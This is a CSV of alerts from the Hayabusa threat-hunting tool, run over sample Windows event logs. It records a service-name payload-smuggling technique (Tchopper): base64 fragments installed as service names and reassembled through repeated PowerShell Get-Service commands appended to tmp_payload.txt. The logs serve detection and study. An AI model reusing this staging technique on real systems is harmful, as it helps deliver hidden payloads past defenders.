2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:34:27.978 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:27.993 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:29.447 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:29.447 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:30.888 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:30.888 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:32.339 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:32.339 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:33.784 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:33.784 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:35.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:35.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:36.836 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:36.836 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:38.274 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:38.290 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf2c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:39.743 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:39.743 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:41.196 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:41.196 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:42.635 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:42.651 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:44.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:44.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:45.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:45.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:47.024 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:47.024 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x20c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:48.467 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf1c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:48.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:49.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:49.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:51.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:51.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:52.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:52.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:54.271 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:54.287 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:55.740 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:55.740 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:57.207 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
